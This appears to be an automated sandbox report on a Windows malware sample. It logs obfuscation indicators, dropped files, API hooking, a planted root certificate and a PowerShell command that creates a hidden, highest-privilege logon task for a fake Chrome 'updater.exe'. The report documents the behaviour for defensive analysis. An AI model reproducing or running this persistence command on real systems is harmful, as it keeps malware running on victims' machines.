Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: updater.exe.0.dr Static PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
Source: ylVAEHbMLf.exe Static PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
Source: yfiogronfirx.tmp.0.dr Static PE information: real checksum: 0x25e65 should be: 0x2b1bf
Source: ylVAEHbMLf.exe Static PE information: section name: .xdata
Source: updater.exe.0.dr Static PE information: section name: .xdata
Source: yfiogronfirx.tmp.0.dr Static PE information: section name: .xdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B6DD2A5 pushad ; iretd 5_2_00007FFD9B6DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B7F000C pushad ; iretd 5_2_00007FFD9B7F00C1
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6222B8 push rdx; retf 7_2_00000225DC6222B9
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6284FD push rcx; retf 003Fh 7_2_00000225DC6284FE
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6594FD push rcx; retf 003Fh 7_2_00000225DC6594FE
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6822B8 push rdx; retf 7_2_00000225DC6822B9
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6884FD push rcx; retf 003Fh 7_2_00000225DC6884FE
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6B94FD push rcx; retf 003Fh 7_2_00000225DC6B94FE
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AC22B8 push rdx; retf 8_2_00000202C0AC22B9
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AC84FD push rcx; retf 003Fh 8_2_00000202C0AC84FE
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AF94FD push rcx; retf 003Fh 8_2_00000202C0AF94FE
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A6612E22B8 push rdx; retf 9_2_000002A6612E22B9
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A6612E84FD push rcx; retf 003Fh 9_2_000002A6612E84FE
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A6613194FD push rcx; retf 003Fh 9_2_000002A6613194FE
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE2722B8 push rdx; retf 10_2_000002BAAE2722B9
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE2784FD push rcx; retf 003Fh 10_2_000002BAAE2784FE
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE2A94FD push rcx; retf 003Fh 10_2_000002BAAE2A94FE
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAED922B8 push rdx; retf 10_2_000002BAAED922B9
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAED984FD push rcx; retf 003Fh 10_2_000002BAAED984FE
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879A84FD push rcx; retf 003Fh 11_2_0000026A879A84FE
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879A22B8 push rdx; retf 11_2_0000026A879A22B9
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537884FD push rcx; retf 003Fh 12_2_00000179537884FE
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537822B8 push rdx; retf 12_2_00000179537822B9
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537B94FD push rcx; retf 003Fh 12_2_00000179537B94FE
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D594FD push rcx; retf 003Fh 12_2_0000017953D594FE
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D5422B8 push rdx; retf 13_2_000002295D5422B9
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D5484FD push rcx; retf 003Fh 13_2_000002295D5484FE
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D5794FD push rcx; retf 003Fh 13_2_000002295D5794FE
Source: C:\Windows\System32\svchost.exe Code function: 14_2_00000253067E22B8 push rdx; retf 14_2_00000253067E22B9
Source: C:\Windows\System32\svchost.exe Code function: 14_2_00000253067E84FD push rcx; retf 003Fh 14_2_00000253067E84FE
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E794FD push rcx; retf 003Fh 14_2_0000025306E794FE

Persistence and Installation Behavior

Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
Source: Yara match File source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe File created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe File created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Boot Survival

Source: Yara match File source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\lsass.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
